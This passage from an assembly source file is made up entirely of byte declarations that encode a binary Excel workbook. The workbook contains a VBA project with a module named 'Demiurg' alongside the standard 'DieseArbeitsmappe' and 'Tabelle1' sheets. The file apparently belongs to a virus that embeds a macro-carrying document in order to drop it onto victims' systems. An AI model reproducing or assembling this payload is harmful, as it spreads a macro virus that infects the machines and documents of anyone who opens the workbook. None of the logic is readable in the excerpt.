000h, 053h, 000h db 000h, 000h, 054h, 000h, 000h, 000h, 055h, 000h db 000h, 000h, 056h, 000h, 000h, 000h, 057h, 000h db 000h, 000h, 058h, 000h, 000h, 000h, 059h, 000h db 000h, 000h, 05Ah, 000h, 000h, 000h, 05Bh, 000h db 000h, 000h, 05Ch, 000h, 000h, 000h, 05Dh, 000h db 000h, 000h, 05Eh, 000h, 000h, 000h, 05Fh, 000h db 000h, 000h, 060h, 000h, 000h, 000h, 061h, 000h db 000h, 000h, 062h, 000h, 000h, 000h, 063h, 000h db 000h, 000h, 064h, 000h, 000h, 000h, 065h, 000h db 000h, 000h, 066h, 000h, 000h, 000h, 0FEh, 0FFh db 0FFh, 0FFh, 068h, 000h, 000h, 000h, 069h, 000h db 000h, 000h, 06Ah, 000h, 000h, 000h, 06Bh, 000h db 000h, 000h, 06Ch, 000h, 000h, 000h, 06Dh, 000h db 000h, 000h, 06Eh, 000h, 000h, 000h, 06Fh, 000h db 000h, 000h, 070h, 000h, 000h, 000h, 071h, 000h db 000h, 000h, 072h, 000h, 000h, 000h, 073h, 000h db 000h, 000h, 074h, 000h, 000h, 000h, 075h, 000h db 000h, 000h, 076h, 000h, 000h, 000h, 077h, 000h db 000h, 000h, 078h, 000h, 000h, 000h, 079h, 000h db 000h, 000h, 07Ah, 000h, 000h, 000h, 07Bh, 000h db 000h, 000h, 07Ch, 000h, 000h, 000h, 07Dh, 000h db 000h, 000h, 07Eh, 000h, 000h, 000h, 07Fh, 000h db 000h, 000h, 080h, 000h, 000h, 000h, 009h, 008h db 010h, 000h, 000h, 006h, 005h, 000h, 0D3h, 010h db 0CCh, 007h, 041h, 000h, 000h, 000h, 006h, 000h db 000h, 000h, 0E1h, 000h, 002h, 000h, 0B0h, 004h db 0C1h, 000h, 002h, 000h, 000h, 000h, 0E2h, 000h db 000h, 000h, 05Ch, 000h, 070h, 000h, 001h, 000h db 000h, 042h, 0E6h, 06Ch, 020h, 042h, 000h, 002h db 000h, 0B0h, 004h, 061h, 001h, 002h, 000h, 000h db 000h, 03Dh, 001h, 002h, 000h, 001h, 000h, 0D3h db 000h, 000h, 000h, 0BAh, 001h, 014h, 000h, 011h db 000h, 000h, 044h, 069h, 065h, 073h, 065h, 041h db 072h, 062h, 065h, 069h, 074h, 073h, 06Dh, 061h db 070h, 070h, 065h, 09Ch, 000h, 002h, 000h, 00Eh db 000h, 019h, 000h, 002h, 000h, 000h, 000h, 012h db 000h, 002h, 000h, 000h, 000h, 013h, 000h, 002h db 000h, 000h, 000h, 0AFh, 001h, 002h, 000h, 000h db 000h, 0BCh, 001h, 002h, 000h, 000h, 000h, 03Dh db 000h, 012h, 000h, 0F0h, 000h, 087h, 000h, 0DCh db 023h, 094h, 011h, 039h, 0E6h, 005h, 000h, 001h db 000h, 058h, 002h, 040h, 000h, 002h, 000h, 000h db 000h, 08Dh, 000h, 002h, 000h, 000h, 000h, 022h db 000h, 002h, 000h, 000h, 000h, 00Eh, 000h, 002h db 000h, 001h, 000h, 0B7h, 001h, 002h, 000h, 000h db 000h, 0DAh, 000h, 002h, 000h, 000h, 000h, 031h db 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h, 0FFh db 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h, 001h db 041h, 000h, 072h, 000h, 069h, 000h, 061h, 000h db 06Ch, 000h, 031h, 000h, 01Ah, 000h, 0C8h, 000h db 000h, 000h, 0FFh, 07Fh, 090h, 001h, 0E6h, 006h db 000h, 005h, 001h, 041h, 000h, 072h, 000h, 069h db 000h, 061h, 000h, 06Ch, 000h, 031h, 000h, 01Ah db 000h, 0C8h, 000h, 000h, 000h, 0FFh, 07Fh, 090h db 001h, 0E6h, 006h, 000h, 005h, 001h, 041h, 000h db 072h, 000h, 069h, 000h, 061h, 000h, 06Ch, 000h db 031h, 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h db 0FFh, 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h db 001h, 041h, 000h, 072h, 000h, 069h, 000h, 061h db 000h, 06Ch, 000h, 01Eh, 004h, 01Eh, 000h, 005h db 000h, 019h, 000h, 000h, 022h, 0F6h, 053h, 022h db 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h, 03Bh db 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h db 023h, 02Ch, 023h, 023h, 030h, 01Eh, 004h, 023h db 000h, 006h, 000h, 01Eh, 000h, 000h, 022h, 0F6h db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h db 030h, 03Bh, 05Bh, 052h, 065h, 064h, 05Dh, 05Ch db 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h, 023h db 02Ch, 023h, 023h, 030h, 01Eh, 004h, 024h, 000h db 007h, 000h, 01Fh, 000h, 000h, 022h, 0F6h, 053h db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h db 02Eh, 030h, 030h, 03Bh, 05Ch, 02Dh, 022h, 0F6h db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h db 030h, 02Eh, 030h, 030h, 01Eh, 004h, 029h, 000h db 008h, 000h, 024h, 000h, 000h, 022h, 0F6h, 053h db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h db 02Eh, 030h, 030h, 03Bh, 05Bh, 052h, 065h, 064h db 05Dh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h db 030h, 01Eh, 004h, 03Eh, 000h, 02Ah, 000h, 039h db 000h, 000h, 05Fh, 02Dh, 022h, 0F6h, 053h, 022h db 05Ch, 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h db 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 022h, 0F6h db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch db 023h, 023h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh db 040h, 05Fh, 02Dh, 01Eh, 004h, 02Ch, 000h, 029h db 000h, 027h, 000h, 000h, 05Fh, 02Dh, 02Ah, 020h db 023h, 02Ch, 023h, 023h, 030h, 05Fh, 02Dh, 03Bh db 05Ch, 02Dh, 02Ah, 020h, 023h, 02Ch, 023h, 023h db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh db 040h, 05Fh, 02Dh, 01Eh, 004h, 046h, 000h, 02Ch db 000h, 041h, 000h, 000h, 05Fh, 02Dh, 022h, 0F6h db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch db 023h, 023h, 030h, 02Eh, 030h, 030h, 05Fh, 02Dh db 03Bh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch db 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h db 02Eh, 030h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 01Eh, 004h, 034h db 000h, 02Bh, 000h, 02Fh, 000h, 000h, 05Fh, 02Dh db 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh db 030h, 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 02Ah db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 0E0h, 000h, 014h db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 0E6h, 00Bh db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h db 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h, 000h db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h db 014h, 000h, 001h, 000h, 000h, 000h, 0F5h, 0FFh db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h db 020h, 0E0h, 000h, 014h, 000h, 002h, 000h, 000h db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h db 002h, 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h db 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h db 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h db 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h db 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h db 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 001h db 000h, 020h, 0E6h, 00Bh, 000h, 0C0h, 020h, 0E0h db 000h, 014h, 000h, 001h, 000h, 02Bh, 000h, 0F5h db 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h, 000h db 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h, 000h db 029h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F8h db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h db 000h, 001h, 000h, 009h, 000h, 0F5h, 0FFh, 020h db 000h, 000h, 0F8h, 0E6h, 008h, 000h, 0C0h, 020h db 0E0h, 000h, 014h, 000h, 001h, 000h, 02Ch, 000h db 0F5h, 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h db 000h, 02Ah, 000h, 0F5h, 0FFh, 020h, 000h, 000h db 0F8h, 0E6h, 008h, 000h, 0C0h, 020h, 093h, 002h db 004h, 000h, 010h, 080h, 003h, 0FFh, 093h, 002h db 004h, 000h, 011h, 080h, 006h, 0FFh, 093h, 002h db 004h, 000h, 012h, 080h, 005h, 0FFh, 093h, 002h db 004h, 000h, 000h, 080h, 000h, 0FFh, 093h, 002h db 004h, 000h, 013h, 080h, 004h, 0FFh, 093h, 002h db 004h, 000h, 014h, 080h, 007h, 0FFh, 060h, 001h db 002h, 000h, 001h, 000h, 085h, 000h, 010h, 000h db 086h, 009h, 0E6h, 004h, 000h, 008h, 000h, 054h db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 08Ch db 000h, 004h, 000h, 031h, 000h, 02Bh, 000h, 0FCh db 000h, 008h, 0E6h, 009h, 000h, 0FFh, 000h, 0FAh db 003h, 008h, 000h, 0FFh, 0FFh, 040h, 000h, 000h db 000h, 040h, 010h, 045h, 000h, 000h, 000h, 040h db 000h, 001h, 000h, 000h, 000h, 00Ch, 000h, 040h db 000h, 051h, 004h, 0E6h, 00Ah, 000h, 085h, 084h db 0F7h, 0BFh, 001h, 000h, 000h, 000h, 09Ch, 084h db 0F7h, 0BFh, 000h, 000h, 040h, 000h, 001h, 000h db 000h, 000h, 038h, 0C6h, 062h, 0E6h, 005h, 000h db 001h, 0E6h, 007h, 000h, 005h, 040h, 000h, 080h db 002h, 094h, 0F7h, 0BFh, 000h, 000h, 040h, 000h db 004h, 000h, 000h, 000h, 0E0h, 006h, 09Ch, 000h db 00Ah, 000h, 000h, 000h, 020h, 000h, 000h, 000h db 0FAh, 07Eh, 070h, 030h, 00Ah, 000h, 000h, 000h db 00Ah, 000h, 000h, 000h, 007h, 00Ch, 000h, 000h db 001h, 000h, 000h, 000h, 0E8h, 006h, 09Ch, 000h db 0B4h, 0C5h, 062h, 0E6h, 00Dh, 000h, 0E6h, 008h db 0FFh, 09Ch, 030h, 075h, 0E6h, 005h, 000h, 069h db 000h, 075h, 000h, 0FFh, 0FFh, 0FFh, 0E7h, 0E6h db 004h, 000h, 05Ch, 000h, 063h, 000h, 005h, 000h db 000h, 000h, 05Ch, 000h, 064h, 000h, 065h, 000h db 06Dh, 000h, 003h, 0E6h, 007h, 000h, 028h, 0D0h db 09Dh, 030h, 0E6h, 008h, 000h, 0E6h, 004h, 0FFh db 0E6h, 014h, 000h, 002h, 007h, 002h, 002h, 0E6h db 004h, 0FFh, 0E6h, 004h, 000h, 003h, 000h, 000h db 000h, 070h, 000h, 07Eh, 030h, 0C3h, 07Ch, 070h db 030h, 004h, 000h, 000h, 000h, 004h, 0E6h, 007h db 000h, 001h, 000h, 000h, 000h, 04Eh, 087h, 075h db 000h, 082h, 0D8h, 07Eh, 030h, 003h, 000h, 000h db 000h, 003h, 0E6h, 00Bh, 000h, 061h, 07Ah, 070h db 030h, 0D4h, 006h, 09Ch, 000h, 00Ah, 000h, 000h db 000h, 0A0h, 0C5h, 062h, 000h, 00Ah, 000h, 000h db 000h, 001h, 000h, 000h, 000h, 00Ah, 000h, 000h db 000h, 0A0h, 0C5h, 062h, 000h, 0D4h, 006h, 09Ch db 000h, 00Ah, 0E6h, 00Bh, 000h, 028h, 0D0h, 09Dh db 030h, 0E6h, 008h, 000h, 002h, 000h, 000h, 000h db 0FFh, 003h, 000h, 000h, 001h, 000h, 000h, 000h db 001h, 000h, 000h, 000h, 001h, 000h, 000h, 000h db 020h, 010h, 000h, 000h, 018h, 0E6h, 007h, 000h db 084h, 0F6h, 053h, 030h, 05Ch, 0C5h, 062h, 000h db 05Dh, 0E6h, 007h, 000h, 002h, 000h, 0C8h, 030h db 000h, 000h, 0C5h, 030h, 0E6h, 004h, 000h, 061h db 07Ah, 070h, 030h, 04Ch, 087h, 075h, 000h, 004h db 000h, 000h, 000h, 07Eh, 00Eh, 002h, 002h, 0E1h db 03Ch, 06Dh, 030h, 016h, 000h, 0C8h, 030h, 0D3h db 000h, 000h, 000h, 09Eh, 0C5h, 062h, 000h, 0FCh db 000h, 000h, 000h, 009h, 000h, 000h, 000h, 0CDh db 015h, 004h, 030h, 000h, 000h, 0C5h, 030h, 004h db 02Ah, 0C8h, 030h, 039h, 015h, 000h, 030h, 007h db 00Ch, 000h, 000h, 001h, 000h, 000h, 000h, 0D4h db 006h, 09Ch, 000h, 00Ah, 000h, 000h, 000h, 0A0h db 0C5h, 062h, 000h, 00Ah, 000h, 000h, 000h, 0D0h db 006h, 09Ch, 0E6h, 005h, 000h, 0A0h, 0C7h, 062h db 000h, 05Dh, 0E6h, 007h, 000h, 08Eh, 08Fh, 00Fh db 030h, 0E6h, 004h, 000h, 09Ch, 0C5h, 062h, 000h db 00Bh, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 070h db 006h, 09Ch, 000h, 0DCh, 0C7h, 062h, 000h, 004h db 000h, 000h, 000h, 00Bh, 000h, 057h, 000h, 0E4h db 000h, 068h, 000h, 072h, 000h, 075h, 000h, 06Eh db 000h, 067h, 000h, 020h, 000h, 05Bh, 000h, 030h db 000h, 05Dh, 000h, 000h, 000h, 05Fh, 000h, 000h db 000h, 001h, 000h, 008h, 000h, 09Ah, 00Dh, 0E6h db 004h, 000h, 0AEh, 082h, 070h, 030h, 007h, 00Ch db 000h, 000h, 001h, 000h, 000h, 000h, 04Ch, 087h db 075h, 000h, 004h, 000h, 000h, 000h, 080h, 0D8h db 07Eh, 030h, 004h, 000h, 000h, 000h, 0AEh, 082h db 070h, 030h, 007h, 00Ch, 000h, 000h, 001h, 000h db 000h, 000h, 064h, 000h, 098h, 000h, 002h, 000h db 000h, 000h, 065h, 010h, 000h, 030h, 064h, 000h db 098h, 000h, 096h, 06Ah, 054h, 030h, 004h, 000h db 000h, 000h, 0D9h, 010h, 000h, 030h, 096h, 06Ah db 054h, 030h, 052h, 070h, 054h, 030h, 0C2h, 0C8h db 010h, 030h, 096h, 01Ah, 09Ah, 000h, 050h, 000h db 098h, 000h, 065h, 010h, 000h, 030h, 050h, 000h db 098h, 000h, 096h, 01Ah, 09Ah, 000h, 002h, 000h db 000h, 000h, 0DDh, 088h, 00Fh, 030h, 096h, 01Ah db 09Ah, 000h, 050h, 000h, 098h, 000h, 001h, 000h db 000h, 000h, 060h, 01Ah, 09Ah, 0E6h, 005h, 000h db 008h, 000h, 098h, 000h, 0FCh, 001h, 098h, 0E6h db 009h, 000h, 0A4h, 01Ah, 09Ah, 0E6h, 00Dh, 000h db 03Fh, 0E6h, 007h, 000h, 0B0h, 0C6h, 062h, 000h db 039h, 086h, 00Fh, 030h, 006h, 000h, 000h, 000h db 060h, 01Ah, 09Ah, 000h, 02Dh, 000h, 000h, 000h db 007h, 000h, 000h, 000h, 006h, 002h, 098h, 000h db 0DEh, 0C7h, 062h, 000h, 0DCh, 0C7h, 062h, 000h db 008h, 000h, 098h, 000h, 007h, 000h, 000h, 000h db 03Dh, 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h db 0E6h, 004h, 000h, 065h, 010h, 000h, 030h, 070h db 06Ah, 054h, 030h, 0ECh, 004h, 09Ah, 000h, 04Ch db 000h, 000h, 000h, 0D9h, 010h, 000h, 030h, 0ECh db 004h, 09Ah, 000h, 070h, 06Ah, 054h, 030h, 04Ch db 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h, 0BAh db 0C7h, 062h, 000h, 0C0h, 0C7h, 062h, 0E6h, 00Dh db 000h, 0A2h, 0C7h, 010h, 030h, 009h, 004h, 0E6h db 00Ah, 000h, 024h, 000h, 000h, 000h, 0FCh, 0E7h db 062h, 000h, 0F3h, 083h, 00Fh, 030h, 04Ch, 0C7h db 062h, 000h, 001h, 000h, 000h, 000h, 010h, 0A3h db 09Ah, 0E6h, 009h, 000h, 0C0h, 0C7h, 062h, 0E6h db 005h, 000h, 010h, 0A3h, 09Ah, 0E6h, 005h, 000h db 0F4h, 0C6h, 062h, 000h, 06Eh, 083h, 00Fh, 030h db 0E6h, 024h, 000h, 038h, 005h, 09Ch, 000h, 0DCh db 0C7h, 062h, 000h, 014h, 000h, 000h, 000h, 0E0h db 000h, 000h, 000h, 0A8h, 0C7h, 062h, 000h, 0FCh db 0E7h, 062h, 0E6h, 005h, 000h, 01Ch, 0A2h, 09Ah db 000h, 0C4h, 0C7h, 062h, 000h, 09Ah, 020h, 000h db 030h, 01Ch, 0A2h, 09Ah, 000h, 073h, 090h, 00Ah db 000h, 000h, 000h, 009h, 008h, 010h, 000h, 000h db 006h, 010h, 000h, 0D3h, 010h, 0CCh, 007h, 041h db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 00Bh db 002h, 010h, 0E6h, 00Dh, 000h, 03Eh, 00Ah, 000h db 000h, 00Dh, 000h, 002h, 000h, 001h, 000h, 00Ch db 000h, 002h, 000h, 064h, 000h, 00Fh, 000h, 002h db 000h, 001h, 000h, 011h, 000h, 002h, 000h, 000h db 000h, 010h, 000h, 008h, 000h, 0FCh, 0A9h, 0F1h db 0D2h, 04Dh, 062h, 050h, 03Fh, 05Fh, 000h, 002h db 000h, 001h, 000h, 02Ah, 000h, 002h, 000h, 000h db 000h, 02Bh, 000h, 002h, 000h, 000h, 000h, 082h db 000h, 002h, 000h, 001h, 000h, 080h, 000h, 008h db 0E6h, 009h, 000h, 025h, 002h, 004h, 000h, 000h db 000h, 0FFh, 000h, 081h, 000h, 002h, 000h, 0C1h db 004h, 014h, 000h, 000h, 000h, 015h, 000h, 000h db 000h, 083h, 000h, 002h, 000h, 000h, 000h, 084h db 000h, 002h, 000h, 000h, 000h, 0A1h, 000h, 022h db 000h, 000h, 000h, 0FFh, 000h, 001h, 000h, 001h db 000h, 001h, 000h, 004h, 000h, 0DEh, 0C7h, 062h db 000h, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh db 03Fh, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh db 03Fh, 0CEh, 05Ah, 055h, 000h, 002h, 000h, 00Ah db 000h, 000h, 002h, 00Eh, 0E6h, 00Fh, 000h, 03Eh db 002h, 012h, 000h, 0B6h, 006h, 0E6h, 004h, 000h db 040h, 0E6h, 00Bh, 000h, 01Dh, 000h, 00Fh, 000h db 003h, 0E6h, 006h, 000h, 001h, 0E6h, 007h, 000h db 0BAh, 001h, 00Bh, 000h, 008h, 000h, 000h, 054h db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 00Ah db 0E6h, 031h, 000h, 001h, 016h, 001h, 000h, 000h db 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h, 004h db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h db 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h, 000h db 000h, 003h, 000h, 000h, 000h, 005h, 000h, 000h db 000h, 007h, 000h, 000h, 000h, 0E6h, 008h, 0FFh db 001h, 001h, 008h, 000h, 000h, 000h, 0E6h, 004h db 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h, 000h db 000h, 0AFh, 002h, 000h, 000h, 0F5h, 001h, 000h db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 001h db 000h, 000h, 000h, 0B5h, 031h, 0B7h, 031h, 000h db 000h, 0FFh, 0FFh, 023h, 000h, 000h, 000h, 088h db 000h, 000h, 000h, 008h, 0E6h, 020h, 000h, 0FFh db 0FFh, 000h, 000h, 0CBh, 002h, 000h, 000h, 0D6h db 000h, 000h, 000h, 0D6h, 000h, 000h, 000h, 01Fh db 003h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h db 004h, 000h, 0DFh, 000h, 0FFh, 0FFh, 0E6h, 004h db 000h, 00Ch, 000h, 0E6h, 058h, 0FFh, 044h, 000h db 069h, 000h, 065h, 000h, 073h, 000h, 065h, 000h db 041h, 000h, 072h, 000h, 062h, 000h, 065h, 000h db 069h, 000h, 074h, 000h, 073h, 000h, 06Dh, 000h db 061h, 000h, 070h, 000h, 070h, 000h, 065h, 0E6h db 01Fh, 000h, 024h, 000h, 002h, 001h, 007h, 000h db 000h, 000h, 0E6h, 008h, 0FFh, 0E6h, 024h, 000h db 02Bh, 000h, 000h, 000h, 0CAh, 003h, 0E6h, 006h db 000h, 054h, 000h, 061h, 000h, 062h, 000h, 065h db 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h, 031h db 0E6h, 031h, 000h, 012h, 000h, 002h, 001h, 006h db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 0E6h db 004h, 0FFh, 0E6h, 024h, 000h, 03Bh, 000h, 000h db 000h, 0BFh, 003h, 0E6h, 006h, 000h, 044h, 000h db 065h, 000h, 06Dh, 000h, 069h, 000h, 075h, 000h db 072h, 000h, 067h, 0E6h, 033h, 000h, 010h, 000h db 002h, 001h, 008h, 000h, 000h, 000h, 0E6h, 008h db 0FFh, 0E6h, 024h, 000h, 04Ah, 000h, 000h, 000h db 01Fh, 007h, 0E6h, 006h, 000h, 05Fh, 000h, 056h db 000h, 042h, 000h, 041h, 000h, 05Fh, 000h, 050h db 000h, 052h, 000h, 04Fh, 000h, 04Ah, 000h, 045h db 000h, 043h, 000h, 054h, 0E6h, 029h, 000h, 01Ah db 000h, 002h, 000h, 0E6h, 00Ch, 0FFh, 0E6h, 024h db 000h, 067h, 000h, 000h, 000h, 059h, 00Ch, 0E6h db 006h, 000h, 0E6h, 028h, 0FFh, 028h, 000h, 000h db 000h, 002h, 000h, 053h, 04Ch, 0E6h, 004h, 0FFh db 000h, 000h, 001h, 000h, 053h, 010h, 0E6h, 004h db 0FFh, 000h, 000h, 001h, 000h, 053h, 094h, 0E6h db 004h, 0FFh, 0E6h, 004h, 000h, 002h, 03Ch, 0E6h db 004h, 0FFh, 000h, 000h, 0FFh, 0FFh, 001h, 001h db 0E6h, 004h, 000h, 001h, 000h, 04Eh, 000h, 030h db 000h, 07Bh, 000h, 030h, 000h, 030h, 000h, 030h db 000h, 032h, 000h, 030h, 000h, 038h, 000h, 031h db 000h, 039h, 000h, 02Dh, 000h, 030h, 000h, 030h db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 02Dh db 000h, 043h, 000h, 030h, 000h, 030h, 000h, 030h db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 034h db 000h, 036h, 000h, 07Dh, 0E6h, 007h, 000h, 0DFh db 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 001h, 001h db 038h, 000h, 000h, 000h, 002h, 081h, 0FEh, 0E6h db 009h, 0FFh, 028h, 0E6h, 005h, 000h, 0FFh, 0FFh db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 074h, 000h db 020h, 000h, 01Dh, 000h, 000h, 000h, 024h, 000h db 000h, 000h, 0E6h, 004h, 0FFh, 048h, 0E6h, 005h db 000h, 0FFh, 0FFh, 000h, 000h, 001h, 0E6h, 007h db 000h, 0E6h, 00Ch, 0FFh, 0E6h, 004h, 000h, 0E6h db 010h, 0FFh, 0E6h, 004h, 000h, 0E6h, 010h, 0FFh db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 0E6h, 004h db 000h, 0E6h, 01Eh, 0FFh, 04Dh, 045h, 000h, 000h db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 000h, 000h db 0E6h, 004h, 0FFh, 001h, 001h, 008h, 000h, 000h db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h db 001h, 0A7h, 0B0h, 000h, 041h, 074h, 074h, 072h db 069h, 062h, 075h, 074h, 000h, 065h, 020h, 056h db 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h, 020h db 03Dh, 020h, 022h, 044h, 069h, 065h, 000h, 073h db 065h, 041h, 072h, 062h, 065h, 069h, 074h, 000h db 073h, 06Dh, 061h, 070h, 070h, 065h, 022h, 00Dh db 022h, 00Ah, 00Ah, 0A0h, 042h, 061h, 073h, 002h db 0A0h, 030h, 07Bh, 000h, 030h, 030h, 030h, 032h db 030h, 038h, 031h, 039h, 0EAh, 02Dh, 000h, 010h db 030h, 003h, 008h, 043h, 000h, 014h, 002h, 012h db 001h, 024h, 020h, 030h, 030h, 034h, 036h, 07Dh db 00Dh, 07Ch, 043h, 072h, 040h, 065h, 061h, 074h db 061h, 062h, 06Ch, 001h, 086h, 046h, 010h, 061h db 06Ch, 073h, 065h, 00Ch, 05Eh, 050h, 072h, 065h db 020h, 064h, 065h, 063h, 06Ch, 061h, 000h, 006h db 049h, 064h, 011h, 000h, 090h, 054h, 072h, 075h db 00Dh, 022h, 045h, 078h, 070h, 008h, 06Fh, 073h db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 000h db 06Ch, 061h, 074h, 065h, 044h, 065h, 072h, 069h db 006h, 076h, 002h, 024h, 011h, 065h, 043h, 075h db 073h, 074h, 06Fh, 018h, 06Dh, 069h, 07Ah, 004h db 044h, 003h, 032h, 0E6h, 036h, 000h, 001h, 016h db 001h, 000h, 000h, 0B6h, 000h, 0FFh, 0FFh, 001h db 001h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 034h, 000h db 010h, 000h, 000h, 000h, 003h, 000h, 000h, 000h db 005h, 000h, 000h, 000h, 007h, 000h, 000h, 000h db 0E6h, 008h, 0FFh, 001h, 001h, 008h, 000h, 000h db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h db 0DEh, 000h, 000h, 000h, 0AFh, 002h, 000h, 000h db 0F5h, 001h, 000h, 000h, 0E6h, 004h, 0FFh, 0E6h db 004h, 000h, 001h, 000h, 000h, 000h, 0B5h, 031h db 0B9h, 031h, 000h, 000h, 0FFh, 0FFh, 023h, 000h db 000h, 000h, 088h, 000h, 000h, 000h, 008h, 0E6h db 020h, 000h, 0FFh, 0FFh, 000h, 000h, 0CBh, 002h db 000h, 000h, 0D6h, 000h, 000h, 000h, 0D6h, 000h db 000h, 000h, 01Fh, 003h, 0E6h, 004h, 000h, 